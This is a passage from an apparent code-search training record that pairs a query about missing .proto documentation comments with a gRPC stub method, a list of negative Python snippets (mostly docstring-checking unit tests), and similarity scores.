self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def __init__(self, proto):\n self.proto = proto", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6347405", "0.62316597", "0.62253404", "0.6107218", "0.60712713", "0.6055634", "0.60191995", "0.5996731", "0.597168", "0.59466904", "0.59434444", "0.59335643", "0.5919223", "0.5902901", "0.58987755", "0.5864407", "0.5856765", "0.5836615", "0.57913834", "0.57687634", "0.5763714", "0.57372254", "0.5724019", "0.5721367", "0.57097507", "0.5693322", "0.5633919", "0.5631681", "0.5627807", "0.56277686", "0.5608027", "0.55785465", "0.5573401", "0.55674845", "0.55551904", "0.5549059", "0.553947", "0.5534518", "0.5531683", "0.55310714", "0.55151445", "0.55110514", "0.5500249", "0.5493004", "0.548441", "0.5478941", "0.5474353", "0.5463836", "0.5458455", "0.5458455", "0.5458455", "0.5452267", "0.54450864", "0.54251957", "0.5421046", "0.5412398", "0.5397417", "0.5395437", "0.5393102", "0.5386761", "0.53758156", "0.5353344", "0.53435314", "0.5338307", "0.5337008", "0.53325796", "0.53264475", "0.5325588", "0.5324948", "0.5321367", "0.53188294", "0.5317395", "0.5313514", "0.5306335", "0.52826846", "0.526687", "0.5262916", "0.5252228", "0.52204585", "0.52173424", "0.52134776", "0.5213095", "0.5209492", "0.52052844", "0.5204341", "0.51928616", "0.51881623", "0.5186641", "0.51833606", "0.5181922", "0.51770014", "0.51718605", "0.5163659", "0.5162326", "0.5162326", "0.5161769", "0.51591885", "0.5157628", "0.5145468", "0.51423216", "0.5138763" ]
0.0
-1
Missing associated documentation comment in .proto file.
def DumpV2(self, request, context):
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details('Method not implemented!')
    raise NotImplementedError('Method not implemented!')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def init_doc(self):\n raise NotImplementedError()", "def inherits_doc():\n pass", "def documentation_only():\n pass", "def DocString():\n return", "def test_module_doc(self):\n self.assertTrue(len(base.__doc__) > 0)", "def pythondoc(self, irc, msg, args, num, req):\n self.googleq('http://docs.python.org/library/', req, num, irc)", "def cppdoc(self, irc, msg, args, num, req):\n self.googleq('www.cplusplus.com/reference/', req, num, irc)", "def testDocstring(self):\n class NotImportant(messages.Enum):\n \"\"\"I have a docstring.\"\"\"\n\n VALUE1 = 1\n\n self.assertEquals('I have a docstring.', NotImportant.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(base_model.__doc__) > 0)", "def phpdoc(self, irc, msg, args, num, req):\n self.googleq('http://php.net/manual/en/', req, num, irc)", "def strip_doc_string(proto: google.protobuf.message.Message) -> None:\n if not isinstance(proto, google.protobuf.message.Message):\n raise TypeError(\n f\"proto must be an instance of {google.protobuf.message.Message}.\"\n )\n for descriptor in proto.DESCRIPTOR.fields:\n if descriptor.name == \"doc_string\":\n proto.ClearField(descriptor.name)\n elif descriptor.type == descriptor.TYPE_MESSAGE:\n if descriptor.label == descriptor.LABEL_REPEATED:\n for x in getattr(proto, descriptor.name):\n strip_doc_string(x)\n elif proto.HasField(descriptor.name):\n strip_doc_string(getattr(proto, descriptor.name))", "def docstring_hack():\n pass", "def check_documentation(self):\n\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(__init__.__doc__)\n self.assertIsNotNone(__str__.__doc__)\n self.assertIsNotNone(save.__doc__)\n self.assertIsNotNone(to_dict.__doc__)", "def consistent_documentation():\n\n return 3", "def test_init_doc(self):\n self.assertTrue(\n len(Review.__init__.__doc__) > 10\n )", "def test_missing_docstring(a, b): # noqa: D213, D407", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)", "def test_docstring(self):\n self.assertTrue(len(BaseModel.__doc__) > 1)\n self.assertTrue(len(BaseModel.__init__.__doc__) > 1)\n self.assertTrue(len(BaseModel.__str__.__doc__) > 1)\n self.assertTrue(len(BaseModel.save.__doc__) > 1)\n self.assertTrue(len(BaseModel.to_dict.__doc__) > 1)", "def __doc__(self, ???):", "def test_class_doc(self):\n self.assertTrue(\n len(Review.__doc__) > 10\n )", "def test_module_doc(self):\n self.assertTrue(len(amenity.__doc__) > 0)", "def test_docstring(self):\n self.assertIsNotNone(Base.__doc__)", "def test_module_doc(self):\n self.assertTrue(len(r.__doc__) > 10)", "def test_docstring(self):\n self.assertIsNotNone(Place.__doc__)", "def test_documentation(self):\n self.assertTrue(hasattr(Base, \"__init__\"))\n self.assertTrue(hasattr(Base, \"create\"))\n self.assertTrue(hasattr(Base, \"to_json_string\"))\n self.assertTrue(hasattr(Base, \"from_json_string\"))\n self.assertTrue(hasattr(Base, \"save_to_file\"))\n self.assertTrue(hasattr(Base, \"load_from_file\"))\n self.assertTrue(Base.__init__.__doc__)\n self.assertTrue(Base.create.__doc__)\n self.assertTrue(Base.to_json_string.__doc__)\n self.assertTrue(Base.from_json_string.__doc__)\n self.assertTrue(Base.save_to_file.__doc__)\n self.assertTrue(Base.load_from_file.__doc__)", "def has_doc() -> None:", "def test_doc(self):\n self.assertTrue(len(max_integer.__doc__) > 0)\n self.assertTrue(len(__import__('6-max_integer').__doc__) > 0)", "def test_docstring(self):\n self.assertTrue(len(City.__doc__) > 1)\n self.assertTrue(len(City.__init__.__doc__) > 1)\n self.assertTrue(len(City.__str__.__doc__) > 1)\n 
self.assertTrue(len(City.save.__doc__) > 1)\n self.assertTrue(len(City.to_dict.__doc__) > 1)", "def test_docstring(self):\n self.assertIsNotNone(Review.__doc__)\n self.assertIsNotNone(Review.text.__doc__)", "def test_docstring(self):\n self.assertIsNotNone(BaseModel.__doc__)\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)", "def fini_doc(self):\n raise NotImplementedError()", "def test_doc():\n pass", "def test_module_doc(self):\n self.assertTrue(len(user.__doc__) > 0)", "def lispdoc(self, irc, msg, args, num, req):\n self.googleq('http://lispdoc.com/', req, num, irc)", "def test_module_doc(self):\n self.assertTrue(len(models.amenity.__doc__) > 0)", "def bus_func_doc(self, bus):\n return None", "def test_doc2(self):\n assert Review.__doc__ is not None", "def c_comment(self, token: Token):\n if token.value.startswith(\"/**\"):\n self.doc_comments.append(PrefixCppDocComment(token))", "def test_module_doc(self):\n self.assertTrue(len(State.__doc__) > 0)", "def test_module_doc(self):\n self.assertTrue(len(db_storage.__doc__) > 0)", "def test_BaseModel_cls_doc(self):\n self.assertIsNotNone(BaseModel.__doc__)", "def doc_string():\n pass # pass does nothing", "def test_docstrings(self):\n self.assertEqual(len(Rectangle.__doc__) > 0, True)\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def test_student_module_docstring(self):\n self.assertIsNot(student.__doc__, None,\n \"student.py needs a docstring\")\n self.assertTrue(len(student.__doc__) >= 1,\n \"student.py needs a docstring\")", "def test_documentation(self):\n doc = City.__doc__\n self.assertGreaterEqual(len(doc), 1)", "def test_Userdoc(self):\n self.assertNotEqual(len(User.__doc__), 0)", "def __init__ (self, docstring, name, isInternal):\n\n # Take out excess leading blank lines.\n docstring = re.sub('/\\*\\*(\\s+\\*)+', r'/** \\n *', docstring)\n\n self.docstring = docstring\n self.name = name\n self.isInternal = isInternal", "def test_module_doc(self):\n self.assertTrue(len(city.__doc__) > 0)", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def test_BaseModel_methods_doc(self):\n self.assertIsNotNone(BaseModel.__init__.__doc__)\n self.assertIsNotNone(BaseModel.__str__.__doc__)\n self.assertIsNotNone(BaseModel.save.__doc__)\n self.assertIsNotNone(BaseModel.to_dict.__doc__)", "def javadoc(self, irc, msg, args, num, req):\n self.googleq('download.oracle.com/javase/6/docs/', req, num, irc)", "def implement(self):\n\t#@DEBUG remove comments", "def magic_pdoc(self, parameter_s=''):\n 
self._inspect('pdoc',parameter_s)", "def dummy(doc):\r\n return doc", "def _add_doc(func, doc):\n func.__doc__ = doc", "def test_proto_spec(self):\n proto_name = 'org.xlattice.upax'\n node_reg = reg.NodeReg()\n proto_reg = reg.ProtoReg(proto_name, node_reg)\n msg_reg = reg.MsgReg(proto_reg)\n proto_spec = M.ProtoSpec(proto_name, proto_reg)\n self.assertEqual(proto_name, proto_spec.name)\n parent = M.ProtoSpec(proto_name, proto_reg)\n\n msg_name = 'logEntry'\n # the enum is not used\n enum = M.EnumSpec.create('Joe', [\n ('oh', 92), ('hello', 47), ('there', 322), ])\n fields = [\n # pylint: disable=no-member\n M.FieldSpec(\n msg_reg,\n 'timestamp',\n FieldTypes.F_UINT32,\n Quants.REQUIRED,\n 0),\n M.FieldSpec(\n msg_reg,\n 'node_id',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 1),\n M.FieldSpec(\n msg_reg,\n 'key',\n FieldTypes.F_BYTES20,\n Quants.REQUIRED,\n 2),\n M.FieldSpec(\n msg_reg,\n 'length',\n FieldTypes.V_UINT32,\n Quants.REQUIRED,\n 3),\n M.FieldSpec(\n msg_reg,\n 'by_',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 4),\n M.FieldSpec(\n msg_reg,\n 'path',\n FieldTypes.L_STRING,\n Quants.REQUIRED,\n 5),\n ]\n msg_spec = M.MsgSpec(msg_name, msg_reg, proto_spec)\n self.assertEqual(msg_name, msg_spec.name)\n for file in fields:\n msg_spec.add_field(file)\n\n # proto_spec.add_msg(msg_spec) # correctly commented out\n self.round_trip_poto_spec_via_string(proto_spec) # GEEP", "def test_student_class_docstring(self):\n self.assertIsNot(Student.__doc__, None,\n \"Student class needs a docstring\")\n self.assertTrue(len(Student.__doc__) >= 1,\n \"Student class needs a docstring\")", "def main_docstring():", "def test_docstring(self):\n self.assertTrue(len(FileStorage.__doc__) > 1)\n self.assertTrue(len(FileStorage.all.__doc__) > 1)\n self.assertTrue(len(FileStorage.new.__doc__) > 1)\n self.assertTrue(len(FileStorage.save.__doc__) > 1)\n self.assertTrue(len(FileStorage.reload.__doc__) > 1)", "def describe(self):\n return \"The method describe() is not implemented\"", "def test_console_documented(self):\n self.assertTrue\n self.assertTrue\n (len(HBNBCommand.__doc__) >= 1)", "def test_class_docstrings(self):\n self.assertGreater(len(self.storage.__doc__), 1)", "def __init__(self, proto):\n self.proto = proto", "def func_doc():", "def get_documentation(self, *args, **dargs):\n pass", "def __init__ (self, isInternal, docstring, name, args, isConst):\n\n self.name = name\n self.isConst = isConst\n self.isInternal = isInternal\n\n if isInternal:\n if language == 'java':\n # We have a special Javadoc doclet that understands a non-standard\n # Javadoc tag, @internal. When present in the documentation string\n # of a method, it causes it to be excluded from the final\n # documentation output. @internal is something doxygen offers.\n #\n p = re.compile('(\\s+?)\\*/', re.MULTILINE)\n self.docstring = p.sub(r'\\1* @internal\\1*/', docstring)\n elif language == 'csharp':\n # We mark internal methods in a different way for C#.\n self.docstring = docstring\n else:\n self.docstring = \" @internal\\n\" + docstring\n else:\n self.docstring = docstring\n\n # In Java and C#, if a method is const and swig has to translate the type,\n # then for some reason swig cannot match up the resulting doc strings\n # that we put into %javamethodmodifiers. The result is that the java\n # documentation for the methods are empty. 
I can't figure out why, but\n # have figured out that if we omit the argument list in the doc string\n # that is put on %javamethodmodifiers for such case, swig does generate \n # the comments for those methods. This approach is potentially dangerous\n # because swig might attach the doc string to the wrong method if a\n # methods has multiple versions with varying argument types, but the\n # combination doesn't seem to arise in antimony currently, and anyway,\n # this fixes a real problem in the Java documentation for antimony.\n\n if language == 'java' or language == 'csharp':\n if isConst and (args.find('unsigned int') >= 0):\n self.args = ''\n elif not args.strip() == '()':\n if isConst:\n self.args = args + ' const'\n else:\n self.args = args\n else:\n if isConst:\n self.args = '() const'\n else:\n self.args = ''\n else:\n self.args = args", "def guess(cls, docstring):", "def HandleMissingParameterDoc(self, token, param_name):\n raise TypeError('Abstract method HandleMissingParameterDoc not implemented')", "def shortDescription(self):\n # Suppress default logging of docstrings.\n return None", "def docs():", "def __init__(self):\n super(MethodInfo, self).__init__()\n self.DocString = None", "def test_file_storage_module_docstring(self):\n self.assertIsNot(file_storage.__doc__, None,\n \"file_storage.py needs a docstring\")\n self.assertTrue(len(file_storage.__doc__) >= 1,\n \"file_storage.py needs a docstring\")", "def handle_protobuf(self, message: protobuf.ProtocolMessage) -> None:", "def test_doc_file(self):\n expected = 'City class handles all application cities'\n actual = City.__doc__\n self.assertEqual(expected, actual)", "def missed_needed_docstring(self):\n self.needed += 1\n self.missing += 1", "def test_documentation(self):\n self.assertTrue(hasattr(Rectangle, \"__init__\"))\n self.assertTrue(Rectangle.__init__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"width\"))\n self.assertTrue(Rectangle.width.__doc__)\n self.assertTrue(hasattr(Rectangle, \"height\"))\n self.assertTrue(Rectangle.height.__doc__)\n self.assertTrue(hasattr(Rectangle, \"x\"))\n self.assertTrue(Rectangle.x.__doc__)\n self.assertTrue(hasattr(Rectangle, \"y\"))\n self.assertTrue(Rectangle.y.__doc__)\n self.assertTrue(hasattr(Rectangle, \"area\"))\n self.assertTrue(Rectangle.area.__doc__)\n self.assertTrue(hasattr(Rectangle, \"display\"))\n self.assertTrue(Rectangle.display.__doc__)\n self.assertTrue(hasattr(Rectangle, \"__str__\"))\n self.assertTrue(Rectangle.__str__.__doc__)\n self.assertTrue(hasattr(Rectangle, \"update\"))\n self.assertTrue(Rectangle.update.__doc__)\n self.assertTrue(hasattr(Rectangle, \"to_dictionary\"))\n self.assertTrue(Rectangle.to_dictionary.__doc__)", "def __init__(\n self,\n *,\n public_comment: typing.Optional[str] = None,\n status: typing.Optional[Assignment.Status] = None\n ) -> None:\n ...", "def test_class_doc(self):\n self.assertTrue(len(City.__doc__) > 0)", "def test_doc1(self):\n assert models.review.__doc__ is not None", "def test_doctest(self):\n self.assertTrue(BaseModel.__doc__)\n self.assertTrue(BaseModel.__init__.__doc__)\n self.assertTrue(BaseModel.__str__.__doc__)\n self.assertTrue(BaseModel.save.__doc__)\n self.assertTrue(BaseModel.to_dict.__doc__)", "def should_add_pr_comment(self):\n pass", "def test_findDocumentation(self):\n doc = self.builder._findChanges(\n self.project, self.builder._DOC)\n self.assertEquals(\n doc,\n [(40, 'foo.bar.Baz.quux'),\n (41, 'writing Foo servers')])", "def test_doc_with_comments():\n doc = 
CoNLL.conll2doc(input_str=RUSSIAN_SAMPLE)\n check_russian_doc(doc)", "def test_method_docs(self):\n for func in dir(Base):\n self.assertTrue(len(func.__doc__) > 0)", "def public_fn_with_googley_docstring(self, name, another, state=None):\n return 0", "def test_state_class_docstring(self):\n self.assertIsNot(State.__doc__, None,\n \"docstring not found in State class\")\n self.assertTrue(len(State.__doc__) >= 1,\n \"docstring not found in State class\")", "def getStructPb2():\n return struct_pb2", "def to_proto(self) -> None:\n\n pass", "def test_doc_string():\n # Create fake profiles library by named tuples\n faker_db = session10.create_fake_library_by_namedtuple(10)\n\n assert len(faker_db.__doc__) > 0 , \"Doc string is missing\"", "def test_swagger_field_is_required():\n raw_schema = RawSchemaFactory()\n raw_schema.pop('swagger', None)\n\n assert 'swagger' not in raw_schema\n\n with pytest.raises(ValidationError) as err:\n swagger_schema_validator(raw_schema)\n\n assert_message_in_errors(\n MESSAGES['required']['required'],\n err.value.detail,\n 'required.swagger',\n )", "def brief_documentation(method: object) -> str:\n doc = method.__doc__\n if doc is not None:\n lines = doc.splitlines()\n if len(lines) > 0:\n return lines[0]\n return ''", "def proto_generation_callable(self):\n raise NotImplementedError()", "def proto_generation_callable(self):\n raise NotImplementedError()", "def document(self):\n ...", "def assert_doc_extensions(doc):\n pass", "def comment():", "def test_doc_module(self):\n from models import user\n\n self.assertTrue(len(user.__doc__) > 0)\n self.assertTrue(len(user.User.__doc__) > 0)", "def test_doc(cls, type_str):\n do_doc_test(cls, type_str)", "def test_docstring(self):\n self.assertIsNotNone(City.__doc__)" ]
[ "0.6348721", "0.6232983", "0.6227791", "0.6107919", "0.6073252", "0.6056996", "0.60199225", "0.5997295", "0.5973073", "0.59475285", "0.59426475", "0.59348774", "0.59195995", "0.59041727", "0.5899058", "0.5865414", "0.5857725", "0.5836395", "0.57917976", "0.57693964", "0.5765628", "0.5738139", "0.5725729", "0.57218313", "0.57099766", "0.5694849", "0.5634908", "0.5631503", "0.562838", "0.5627863", "0.5609239", "0.55800056", "0.5575202", "0.5568366", "0.5556774", "0.554996", "0.55403715", "0.5535095", "0.55324805", "0.55324376", "0.5515471", "0.551169", "0.5499882", "0.54952186", "0.54851204", "0.547969", "0.54744124", "0.5465293", "0.5460546", "0.5460546", "0.5460546", "0.5452012", "0.54468", "0.542486", "0.54212755", "0.5413558", "0.5397512", "0.53957206", "0.53943235", "0.5388301", "0.5376187", "0.5353345", "0.534334", "0.5337087", "0.5336514", "0.53339815", "0.5328619", "0.53255814", "0.53247285", "0.5322686", "0.5319762", "0.53191066", "0.53140306", "0.53077936", "0.5279659", "0.5267621", "0.5264218", "0.5252085", "0.5219406", "0.5217774", "0.5214222", "0.5213382", "0.52094376", "0.52063346", "0.5204785", "0.5193972", "0.5189197", "0.51867706", "0.5182037", "0.51802737", "0.5177115", "0.5172607", "0.5164527", "0.51625025", "0.51625025", "0.5162299", "0.5160613", "0.5157092", "0.51471317", "0.5142684", "0.51393735" ]
0.0
-1
depth-first search, mark visited in place, O(n), O(1)
def maxAreaOfIsland(self, grid):
    def helper(x, y):
        if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]) or grid[x][y] == 'X':
            return 0
        if grid[x][y] == 1:
            grid[x][y] = 'X'
            return 1 + helper(x - 1, y) + helper(x + 1, y) + helper(x, y + 1) + helper(x, y - 1)
        else:
            grid[x][y] = 'X'
            return 0

    max_area = 0
    for i in range(len(grid)):
        for j in range(len(grid[0])):
            max_area = max(max_area, helper(i, j))
    return max_area

    """
    - depth-first search, recursive, mark visited in a set
    - O(n), O(n)
    """
    visited = set()  # can use global variable instead of passing into stack

    def helper(x, y):
        if x < 0 or x >= len(grid) or y < 0 or y >= len(grid[0]) or (x, y) in visited:
            return 0
        visited.add((x, y))
        if grid[x][y] == 1:
            return 1 + helper(x - 1, y) + helper(x + 1, y) + helper(x, y + 1) + helper(x, y - 1)
        else:
            return 0

    max_area = 0
    for i in range(len(grid)):
        for j in range(len(grid[0])):
            max_area = max(max_area, helper(i, j))
    return max_area

    """
    - depth-first search, iterative, mark visited in a set
    - O(n), O(n)
    """
    max_area = 0
    visited = set()
    row, col = len(grid), len(grid[0])
    for i in range(row):
        for j in range(col):
            area = 0
            n = grid[i][j]
            stack = [(i, j)]  # use stack to track all neighbors (all need to be searched)
            while stack:
                x, y = stack.pop()
                if 0 <= x < row and 0 <= y < col and (x, y) not in visited:
                    visited.add((x, y))
                    if grid[x][y] == 1:
                        area += 1
                        stack += [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]
            max_area = max(max_area, area)
    return max_area
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def depth_first_search(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = []\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.append(state)\r\n\r\n while(len(fringe) > 0):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n #states = problem.get_successors(state)\r\n for stat in states:\r\n if stat[0] not in path and stat[0] not in fringe:\r\n fringe.append(stat[0])\r\n\r\n while(True):\r\n if state == problem.get_start_state():\r\n break\r\n for key, val in acts.items():\r\n for va in val: #( x, y, z)\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def recursive_dft(self, start, visited=[]):\n if start not in visited:\n visited.append(start)\n for i in self.neighbors(start):\n self.recursive_dft(i, visited)\n return visited", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n \"\"\"\n ALGORITH FOR DFS\n \n function graph-search(problem, fringe) retuen a sloution or failure\n \n closed <-- an empty set\n fringe <-- insert (make-node (initial-state [problem]), fringe)\n \n loop do :\n if fringe is empty then return failure\n node <-- Remove-front (fringe)\n if goal-test (problem, state[node]) then return node\n if state[node] is not in closed then \n add STATE[node] to closed\n for child-node in EXPAND(STATE[node],problem) do\n fringe <-- Insert (child-node, fringe)\n end\n end\n \"\"\"\n\n templist=[]\n explored = set()\n fringe = util.Stack()\n #print \"the stat node is : \", problem.getStartState()\n\n fringe.push((problem.getStartState(),templist))\n while (not fringe.isEmpty()):\n (currentNode,currDir) = fringe.pop()\n # print \"Pacman is currently at : \", currentNode\n if problem.isGoalState(currentNode):\n # print \" Goal State Found : \", currentNode\n pathToGoal = currDir\n break\n if not (currentNode in explored):\n # print \"Adding current node to explored\"\n explored.add(currentNode)\n for childNode in problem.getSuccessors(currentNode):\n # print \"child node : \", childNode , \" is added \"\n fringe.push((childNode[0],currDir+[childNode[1]]))\n\n return pathToGoal", "def depthFirstSearch(problem):\r\n \"*** YOUR CODE HERE ***\"\r\n node = problem.getStartState()\r\n if (problem.isGoalState(node)):\r\n return [] # no need to make any moves of the start state is goal\r\n start = (node, 'NoDirection',0)\r\n\r\n frontier_queue = Stack() # queue for frontier\r\n frontier_queue.push(start) # frontier consists of only the start state\r\n\r\n explored_nodes = set()\r\n explored_track = {start:None} # keep a track of parent, parent of root node is None\r\n\r\n while not frontier_queue.isEmpty():\r\n state = frontier_queue.pop() # pop the top element from the queue \r\n explored_nodes.add(state)\r\n\r\n if problem.isGoalState(state[0]):\r\n return get_track(explored_track, state)\r\n\r\n neighbors_state = problem.getSuccessors(state[0])\r\n for neighbor in neighbors_state: # neighbor will be something like this ((34, 15), 'South', 1)\r\n if neighbor not in frontier_queue.list and neighbor not in explored_nodes:\r\n frontier_queue.push(neighbor)\r\n explored_track[neighbor] = state\r\n\r\n\r\n def get_track(explored_track, state):\r\n from game import Directions\r\n track_history = [state]\r\n track_history_direction = []\r\n leaf = state\r\n while (explored_track[leaf]) != start:\r\n 
